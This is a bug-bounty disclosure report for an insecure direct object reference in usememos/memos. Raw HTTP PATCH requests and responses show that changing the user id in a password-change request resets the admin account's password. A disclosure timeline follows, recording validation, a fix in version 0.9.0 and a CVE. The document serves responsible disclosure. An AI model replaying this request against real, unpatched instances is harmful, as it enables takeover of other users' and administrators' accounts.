Account takeover via changing password in usememos/memos

Valid

Reported on

Dec 19th 2022


Description

after login with normal user go to Settings then change password ,you will find the following request

PATCH /api/user/104 HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MTQ3MjA1M3xEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUE9fF-6AEnsMyuj8shTHmH9_q-nZgcVnIaW9EHKAC4Ncnrl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 30
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"id":104,"password":"xthemo"}

The response of changing password is

HTTP/2 200 OK
Date: Mon, 19 Dec 2022 17:48:17 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 269
Cf-Ray: 77c1f7d9bae011c1-MRS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

{"data":{"id":104,"rowStatus":"NORMAL","createdTs":1671469980,"updatedTs":1671472096,"username":"test","role":"USER","email":"","nickname":"test","openId":"40edea21-d038-44ec-be61-c9699e925bb6","userSettingList":[{"UserID":104,"key":"appearance","value":"\"dark\""}]}}

If you change the "id" in request to 101 (admin account) it will change his password as the following request

PATCH /api/user/104 HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MTQ3MjA1M3xEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUE9fF-6AEnsMyuj8shTHmH9_q-nZgcVnIaW9EHKAC4Ncnrl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 30
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"id":101,"password":"xthemo"}

It will change id 101 password also as in the following response

HTTP/2 200 OK
Date: Mon, 19 Dec 2022 17:48:31 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 271
Cf-Ray: 77c1f8340edb11c1-MRS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

{"data":{"id":101,"rowStatus":"NORMAL","createdTs":1671455650,"updatedTs":1671472111,"username":"demohero","role":"HOST","email":"demo@usememos.com","nickname":"Demo Hero","openId":"demo_open_id","userSettingList":[{"UserID":104,"key":"appearance","value":"\"dark\""}]}}

POC video

https://drive.google.com/file/d/1y2Czg9j4Qgc9mg5Ad3W8DY18ZoRyZkzd/view?usp=sharing

Impact

Any account takeover also admin account

We are processing your report and will contact the usememos/memos team within 24 hours. 21 days ago
We have contacted a member of the usememos/memos team and are waiting to hear back 20 days ago
usememos/memos maintainer validated this vulnerability 20 days ago
Mohamed Abdelhady has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Mohamed
19 days ago

Researcher


Can You assign it as CVE !

STEVEN marked this as fixed in 0.9.0 with commit dca35b 17 days ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 17 days ago
to join this conversation